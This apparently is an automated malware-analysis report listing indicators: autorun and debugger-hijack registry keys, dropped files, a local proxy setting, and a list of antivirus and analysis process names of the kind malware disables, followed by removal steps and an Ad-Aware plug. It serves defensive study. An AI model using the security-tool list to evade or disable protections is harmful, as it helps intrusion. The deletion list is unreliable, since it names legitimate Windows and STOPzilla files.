HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon
{EA6F9A77-5617-406E-AAFA-D7C897C38BA7}
{581907C4-33B7-439A-85BA-3DB34D65D3CD}
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
C:\CMPSUCCESS
%SystemRoot%\system32\wbem\WMIsvc.dll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Winmgmt\Parameters
%LOCAL_APPDATA%\Temp\TarFA22.tmp
%LOCAL_APPDATA%\Temp\TarE7F0.tmp
%LOCAL_APPDATA%\Temp\TarE7DF.tmp
%LOCAL_APPDATA%\Temp\CabFA21.tmp
%LOCAL_APPDATA%\Temp\CabE7EF.tmp
%LOCAL_APPDATA%\Temp\CabE7DE.tmp
\svchost.exe
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MpsSvc
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\system
TcpMaxHalfOpen
HKEY_LOCAL_MACHINE\ControlSet001\Services\Tcpip\Parameters\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
%Program Files%\Common Files\lsass.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
%SystemDrive%
%DOWNLOAD_PROGRAM_FILES%
%FAVORITES%
%SYSTEMROOT%
%SYSTEMDIRECTORY%
%STARTUP%
%STARTMENU%
%USERPROFILE%
%DESKTOPDIRECTORY%
%COOKIES%
%COMMON_STARTUP%
%COMMON_FAVORITES%
%COMMON_STARTMENU%
%COMMON_PROGRAMS%
%COMMMON_ALTSTARTUP%
%WINDOWS%\system32\userinit.exe
rHKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessManager.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\boot.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\auto.exe
HKEY_CLASSES_ROOT\exefile
HKLM\Software\{5AFD725B-CB98-3C32-ADDC-1F6713561294}
HKCU\Software\{5AFD725B-CB98-3C32-ADDC-1F6713561294}
%DESKTOPDIRECTORY%\pQAbGYBP.zip
\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Microsoft\Windows NT\CurrentVersion\Windows
Microsoft\Windows NT\CurrentVersion\Winlogon
Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Microsoft\Windows\CurrentVersion\Run
Microsoft\Windows\CurrentVersion\RunOnce
HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows
%APPDATA%\Sample.lnk
PENDINGFILERENAMEOPERATIONS
u%system%\drivers\etc\hosts
\Uninstall.ini
\Uninstall.exe
\mirniatom.bat
\iosdbfvadj.jka
\alkoid.vbs
System32\DRIVERS\asyncmac.sys
HKEY_CURRENT_USER\Software\Microsoft\DeviceControl
PendingFileRenameOperations
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager
%SYSTEM%\user32.dll
%SYSTEM%\user32.vxe
\AutoConfigURL
HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
rHKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION
%APPDATA%\restore.ini
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
zlclient.exe
wireshark.exe
winmgr.exe
spybotsd.exe
SBPIMSvc.exe
sbamui.exe
SBAMTray.exe
SBAMSvc.exe
rstrui.exe
msseces.exe
MsMpEng.exe
MSASCui.exe
MpCmdRun.exe
mbamservice.exe
mbamscheduler.exe
mbampt.exe
mbamgui.exe
mbam.exe
Mantle.exe
lnssatt.exe
keyscrambler.exe
instup.exe
hijackthis.exe
egui.exe
ComboFix.exe
ccuac.exe
bdagent.exe
avscan.exe
avp.exe
avgwdsvc.exe
avgui.exe
avguard.exe
avgrsx.exe
avgnt.exe
avgidsagent.exe
avgcsrvx.exe
avconfig.exe
avcenter.exe
AvastUI.exe
AvastSvc.exe
Windows Live
WindowsUpdate
HKCU\Software\Microsoft\Windows\CurrentVersion\ime
\HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION
\HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
01000000
HKEY_CURRENT_USER\Software\
\HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
C:\Windows\InstallDir\help.exe
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
{FD38A8A8-5C04-44A4-8C9B-D51223EF50F8}
HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\MICROSOFT\WINDOWS DEFENDER\MP SCHEDULED SCAN
6040515
6816302
C:\USERS\TAUSER\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\SECURITY TOOL.LNK
HKLM\SOFTWARE\MICROSOFT\WINDOWS MEDIA PLAYER NSS\3.0\EVENTS\{F835BF8E-6878-4F76-A634-5A258533E717}\{8B98EAC1-8153-42F5-BEF9-3814AA8233F4}
HKLM\SOFTWARE\MICROSOFT\WINDOWS MEDIA PLAYER NSS\3.0\EVENTS\{AED7EE88-954D-420E-A01F-44BDFF4B8E8A}\{B1CC4B02-3772-4C36-AD98-6926DE9C6E2E}
HKLM\SOFTWARE\MICROSOFT\WINDOWS MEDIA PLAYER NSS\3.0\EVENTS\{AED7EE88-954D-420E-A01F-44BDFF4B8E8A}
HKLM\SOFTWARE\MICROSOFT\WINDOWS MEDIA PLAYER NSS\3.0\EVENTS\{A9840446-BEF8-4616-B901-49964C4E3DF7}\{8B98EAC1-8153-42F5-BEF9-3814AA8233F4}
HKLM\SOFTWARE\MICROSOFT\WINDOWS MEDIA PLAYER NSS\3.0\EVENTS\{A9840446-BEF8-4616-B901-49964C4E3DF7}
HKCU\SOFTWARE\MICROSOFT\MEDIAPLAYER\HEALTH\{B1E5ABB6-6F14-41F6-AEA2-BF537406A4B6}
HKCU\SOFTWARE\MICROSOFT\MEDIAPLAYER\HEALTH\{91899B3D-A02F-4D78-B90E-40BBB59E4A2D}
HKLM\SOFTWARE\MICROSOFT\WINDOWS MEDIA PLAYER NSS\3.0\EVENTS\{BF7E0C08-D53E-46EB-A653-B53C167582F4}\{BD7663B9-926E-4E94-B6BA-F222D979B734}
HKLM\SOFTWARE\MICROSOFT\WINDOWS MEDIA PLAYER NSS\3.0\EVENTS\{BF7E0C08-D53E-46EB-A653-B53C167582F4}
HKLM\SOFTWARE\MICROSOFT\WINDOWS MEDIA PLAYER NSS\3.0\EVENTS\{A771865F-3BF1-43CD-8F63-07035ACEAFFE}\{D78FE903-1652-4F28-A4CD-EB8704749713}
HKLM\SOFTWARE\MICROSOFT\WINDOWS MEDIA PLAYER NSS\3.0\EVENTS\{A771865F-3BF1-43CD-8F63-07035ACEAFFE}
HKLM\SOFTWARE\MICROSOFT\WINDOWS MEDIA PLAYER NSS\3.0\EVENTS\{3FCF9120-D0DD-4AA2-946F-F99DC6FCEA29}\{D78FE903-1652-4F28-A4CD-EB8704749713}
HKLM\SOFTWARE\MICROSOFT\WINDOWS MEDIA PLAYER NSS\3.0\EVENTS\{3FCF9120-D0DD-4AA2-946F-F99DC6FCEA29}\{BD7663B9-926E-4E94-B6BA-F222D979B734}
HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTPAGE\NEWSHORTCUTS
HKCU\SOFTWARE\MICROSOFT\MEDIAPLAYER\HEALTH\{555660CB-2037-4BE0-AAAA-ADB09BB0DFE6}
HKCU\SOFTWARE\MICROSOFT\MEDIAPLAYER\HEALTH\{2208559D-C10C-4288-9048-B27B5E72746C}
HKLM\SOFTWARE\MICROSOFT\WINDOWS MEDIA PLAYER NSS\3.0\EVENTS\{F835BF8E-6878-4F76-A634-5A258533E717}\{B1CC4B02-3772-4C36-AD98-6926DE9C6E2E}
%LOCAL_APPDATA%\TEMP\5440629.BAT
%LOCAL_APPDATA%\TEMP\86283760.BAT
%PROFILE%\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\SECURITY TOOL.LNK
\HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKCU\S-1-5-21-1921027029-3133593505-18383363-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
%STARTMENU%\PROGRAMS\STARTUP\SYSTEM CHECK.LNK
Original Size: %d
c%WINDOWS%\SBS_wininit.vxe
%SYSTEM%\wininit.exe
%WINDOWS%\SBS_explorer.vxe
%WINDOWS%\explorer.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\wmicucltsvc
%WINDOWS%\SBS_wininit.vxe
%WINDOWS%\SBS_winlogon.vxe
%SYSTEM%\winlogon.exe
YZH.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
%SYSTEM%\Drivers\VDWFP.sys
%SYSTEM%\Drivers\VDWFP64.sys
%Program_Files%\Lenovo\VisualDiscovery\VisualDiscovery.tlb
%Program_Files%\Lenovo\VisualDiscovery\VisualDiscovery.exe
%Program_Files%\Lenovo\VisualDiscovery\VDWFPInstaller.exe
%Program_Files%\Lenovo\VisualDiscovery\VDWFP64.sys
%Program_Files%\Lenovo\VisualDiscovery\VDWFP.sys
%Program_Files%\Lenovo\VisualDiscovery\uninstall.exe
%Program_Files%\Lenovo\VisualDiscovery\SuperfishCert.dll
%Program_Files%\Lenovo\VisualDiscovery\ssl3.dll
%Program_Files%\Lenovo\VisualDiscovery\sqlite3.dll
%Program_Files%\Lenovo\VisualDiscovery\softokn3.dll
%Program_Files%\Lenovo\VisualDiscovery\smime3.dll
%Program_Files%\Lenovo\VisualDiscovery\Run.exe
%Program_Files%\Lenovo\VisualDiscovery\nssutil3.dll
%Program_Files%\Lenovo\VisualDiscovery\nssdbm3.dll
%Program_Files%\Lenovo\VisualDiscovery\nssckbi.dll
%Program_Files%\Lenovo\VisualDiscovery\nss3.dll
%Program_Files%\Lenovo\VisualDiscovery\libplds4.dll
%Program_Files%\Lenovo\VisualDiscovery\libplc4.dll
%Program_Files%\Lenovo\VisualDiscovery\libnspr4.dll
%Program_Files%\Lenovo\VisualDiscovery\freebl3.dll
HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\C864484869D41D2B0D32319C5A62F9315AAF2CBD
\Software\Microsoft\Windows\CurrentVersion\Internet Settings
http=127.0.0.1:5555
HKEY_LOCAL_MACHINE\Software\avsuite
HKEY_CURRENT_USER\Software\avsuite
HKEY_LOCAL_MACHINE\Software\AvScan
HKEY_CURRENT_USER\Software\AvScan
HKEY_LOCAL_MACHINE\Software\avsoft
HKEY_CURRENT_USER\Software\avsoft
HKEY_CURRENT_USER\Software\Microsoft\Windows Script\Settings
.pptx
.xlsx
.docx
SBAMSvc.exe_3448_rwx_2F60A000_00060000:
Vh%cQ
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager). The PIDs below are those of the analysis run and will differ on any other machine, so match on image name. Several entries are Windows components (runonce.exe, DrvInst.exe, RUNDLL32.exe, regsvr32.exe, mobsync.exe, MsiExec.exe) that must not be deleted, and STOPzilla.exe together with the SZ*.exe entries appear to be components of the STOPzilla product whose driver files are listed under "files created/modified" below; check a file's hash and signature before removing it:
SBSetupDrivers.exe:3152
SBSetupDrivers.exe:1812
%original file name%.exe:1912
runonce.exe:3092
runonce.exe:2736
GFI.Tools.Run64.exe:1928
DrvInst.exe:2212
DrvInst.exe:1680
STOPzilla.exe:3836
RUNDLL32.exe:3528
regsvr32.exe:3500
regsvr32.exe:1496
SZNetAssistant.exe:3916
mobsync.exe:3264
SZServer.exe:3384
SZServer.exe:992
SZWSC.exe:3788
SZWSC.exe:2612
MsiExec.exe:2456
MsiExec.exe:2624
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Windows\System32\drivers\sbwtis.sys (90 bytes)
%Program Files% (x86)\STOPzilla\Drivers\amd64\wnet\SbFwIm.sys (122 bytes)
%Program Files% (x86)\STOPzilla\Drivers\amd64\sbapifs.sys (90 bytes)
%Program Files% (x86)\STOPzilla\Drivers\amd64\wlh\sbhips.sys (65 bytes)
C:\Windows\System32\drivers\sbhips.sys (65 bytes)
%Program Files% (x86)\STOPzilla\Drivers\amd64\wlh\SBWTIS.sys (90 bytes)
%Program Files% (x86)\STOPzilla\Drivers\amd64\wlh\sbfw.sys (262 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\DRVSetup\SetupDrv.log (17489 bytes)
C:\Windows\System32\drivers\sbapifs.sys (90 bytes)
C:\Windows\System32\drivers\SbFw.sys (1543 bytes)
C:\Windows\System32\drivers\SETEAAC.tmp (601 bytes)
C:\Windows\System32\drivers\SbFwIm.sys (601 bytes)
C:\Windows\System32\DriverStore\infpub.dat (496 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{332d6cab-08ae-5fa0-2478-ed478992213a}\SETDB51.tmp (3 bytes)
C:\Windows\System32\config\SYSTEM (6769 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{6b8be61a-1242-088c-2864-a834156d4a47}\SETDDB5.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{6b8be61a-1242-088c-2864-a834156d4a47}\SETDDB4.tmp (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{332d6cab-08ae-5fa0-2478-ed478992213a}\SETDB31.tmp (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{332d6cab-08ae-5fa0-2478-ed478992213a}\amd64\wnet\SETDB62.tmp (601 bytes)
C:\Windows\System32\DriverStore\infstrng.dat (1764 bytes)
C:\Windows\System32\config\SYSTEM.LOG1 (9355 bytes)
C:\Windows\System32\catroot2\dberr.txt (1248 bytes)
C:\$Directory (768 bytes)
C:\Windows\inf\oem13.PNF (8464 bytes)
C:\Windows\inf\oem14.PNF (4811 bytes)
C:\Windows\System32\drivers\SETED8A.tmp (601 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\elf_hash.dat (5280 bytes)
C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\a81bb17e1f5dc49a730b06b63f6d28e9_c0322acd-5e5d-42f0-b163-c591ee6ff5b9 (61 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libNSIS.dll (3729 bytes)
C:\ProgramData\STOPzilla!\Events\EV2015042504170900.xml (414 bytes)
%Program Files% (x86)\STOPzilla\Definitions\ih.vdx (1425 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\EPSigs.vdx (65 bytes)
C:\ProgramData\STOPzilla!\ThreatNetConfig.xml (810 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\mime0.std (260 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libMsCab.dll (6049 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libRar.dll (5729 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\gfiarkup.dll (6010 bytes)
%Program Files% (x86)\STOPzilla\gfiark.dll (61 bytes)
%Program Files% (x86)\STOPzilla\Definitions\white0.std (15 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libMsi.dll (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\cblk.vtd (1236324 bytes)
%Program Files% (x86)\STOPzilla\Definitions\networkrules.dat (4 bytes)
%Program Files% (x86)\STOPzilla\Definitions\fsigs.vdx (192 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\gfiutl64.sys (310 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\DefVer.txt (260 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libtd.dll (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\bhsl.vtd (22430 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libtd.dll (2377 bytes)
%Program Files% (x86)\STOPzilla\gfiark32.sys (43 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\adsrules.dat (14250 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\SBTS.dat (3280 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libEmail.dll (1425 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\SBTS.dat (328 bytes)
%Program Files% (x86)\STOPzilla\Definitions\macroptn.std (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\macroptn.std (7306 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\smim0.std (50 bytes)
%Program Files% (x86)\STOPzilla\Definitions\CatDesc.vdx (673 bytes)
C:\ProgramData\STOPzilla!\ServiceConfig.xml (10 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\hcol.wtd (226 bytes)
%Program Files% (x86)\STOPzilla\Definitions\lgpl.dll (7345 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\apincl.dat (7140 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libCHM.dll (1873 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\sdll0.std (223360 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\updater.dll (3665 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\ThreatDT.vdx (392 bytes)
%Program Files% (x86)\STOPzilla\Definitions\smim0.std (5 bytes)
%Program Files% (x86)\STOPzilla\Definitions\elf_hash.dat (528 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\IncompatiblePrograms.dll (6010 bytes)
%Program Files% (x86)\STOPzilla\Definitions\api0.std (3073 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\ip.vtd (824 bytes)
%Program Files% (x86)\STOPzilla\SBTE.dll (49 bytes)
C:\ProgramData\STOPzilla!\History\20150425042029.xml (38 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libNSIS.dll (12810 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\api0.std (524 bytes)
%Program Files% (x86)\STOPzilla\Definitions\DefVer.txt (26 bytes)
C:\ProgramData\STOPzilla!\FirewallConfig.xml (1434 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\heur0.std (20 bytes)
%Program Files% (x86)\STOPzilla\mimepp.dll (212 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\remediation.dll (7961 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libRTF.dll (6730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\incompats.dat (1 bytes)
%Program Files% (x86)\STOPzilla\Definitions\updater.dll (849 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libBase64.dll (7025 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\dnrl.vdx (1513 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\AdviceTx.vdx (10 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\ThreatCategoryGlossary.xsd (1 bytes)
%Program Files% (x86)\STOPzilla\Definitions\TImem.vdx (3 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\sdll0.std (64896 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libVvs.dll (12217 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\networkrules.dat (40 bytes)
C:\ProgramData\STOPzilla!\RegistrationConfig.xml (2408 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\whsl.wtd (41850 bytes)
C:\ProgramData\STOPzilla!\ThreatDefinitionsConfig.xml (2236 bytes)
%Program Files% (x86)\STOPzilla\gfiutl64.sys (63 bytes)
%Program Files% (x86)\STOPzilla\Definitions\dex_hash.dat (132706 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\RegDT.vdx (36934 bytes)
%Program Files% (x86)\STOPzilla\Definitions\FastSigs.vdx (1425 bytes)
%Program Files% (x86)\STOPzilla\Definitions\RTmem.vdx (3 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\unpck0.std (55 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\gfiarkup.dll (2537 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\FolderDT.vdx (1953 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libZip.dll (1281 bytes)
%Program Files% (x86)\STOPzilla\Definitions\gfiutl32.sys (24 bytes)
%Program Files% (x86)\STOPzilla\Definitions\dnrl.vdx (1281 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\CoreVer.txt (30 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\dex_hash.dat (378000 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libZip.dll (3441 bytes)
%Program Files% (x86)\STOPzilla\Definitions\ThreatCategoryGlossary.xsd (1 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\CatDesc.vdx (6730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\FileDT.vdx (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\qscnf.vdx (541 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\VVSSigs.vdx (360 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\ih.vdx (11863 bytes)
%Program Files% (x86)\STOPzilla\Definitions\CoreVer.txt (3 bytes)
%Program Files% (x86)\STOPzilla\Definitions\bhmem.vtd (484 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Cookies.vdx (1281 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\dnrl.vdx (12810 bytes)
%Program Files% (x86)\STOPzilla\Definitions\gfiutil.dll (14 bytes)
%Program Files% (x86)\STOPzilla\Definitions\AdviceTx.vdx (10 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\CatID.vdx (9 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libOleA.dll (21050 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\ThreatDT.vdx (545890 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libOleA.dll (4497 bytes)
%Program Files% (x86)\STOPzilla\Definitions\ihmem.vtd (540 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libMachoUniv.dll (2337 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\mime0.std (26 bytes)
%Program Files% (x86)\STOPzilla\Definitions\whsl.wtd (4185 bytes)
%Program Files% (x86)\STOPzilla\Definitions\remediation.dll (2449 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libOleA.dll (2105 bytes)
%Program Files% (x86)\STOPzilla\Definitions\kbu.dat (84216 bytes)
%Program Files% (x86)\STOPzilla\Definitions\heur0.std (2 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\patchw32.dll (3226 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\qscnr.vdx (8 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libCHM.dll (6730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\networkrules.dat (4 bytes)
C:\Windows\System32\drivers\gfiark.sys (86 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\WebFilterExceptions.dat (1840 bytes)
%Program Files% (x86)\STOPzilla\Definitions\EPSigs.vdx (65 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\hstn.vtd (1369 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libZip.dll (12810 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\hstn.vtd (6010 bytes)
%Program Files% (x86)\STOPzilla\Definitions\hstn.vtd (601 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\incompats.dat (10 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libMachoUniv.dll (673 bytes)
C:\ProgramData\STOPzilla!\SoftwareUpdateConfig.xml (1244 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\gfiark64.sys (41 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\adsrules.dat (281 bytes)
%Program Files% (x86)\STOPzilla\Definitions\cmem.vtd (692 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\gfiutl32.sys (24 bytes)
%Program Files% (x86)\STOPzilla\Definitions\mime0.std (26 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\EPSigs.vdx (650 bytes)
%Program Files% (x86)\STOPzilla\Definitions\kbu.dll (62 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\ip.vtd (8240 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\remediation.dll (21050 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\comp0.std (43 bytes)
%Program Files% (x86)\STOPzilla\Definitions\SBTS.dat (328 bytes)
%Program Files% (x86)\STOPzilla\Definitions\pack0.std (14 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\IncompatiblePrograms.dll (2281 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\whsl.wtd (5041 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libNSIS.dll (1281 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\CatID.vdx (90 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\acertdefs0.std (4770 bytes)
%Program Files% (x86)\STOPzilla\Definitions\idsrules.dat (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\WebFilterExceptions.dat (184 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\gfiark.dll (955 bytes)
%Program Files% (x86)\STOPzilla\Definitions\script0.std (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\FileDT.vdx (3227 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\patchw32.dll (12810 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\lgpl.dll (13065 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\bhsl.vtd (224300 bytes)
%Program Files% (x86)\STOPzilla\Definitions\HistoryCleaner.xml (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\smim0.std (5 bytes)
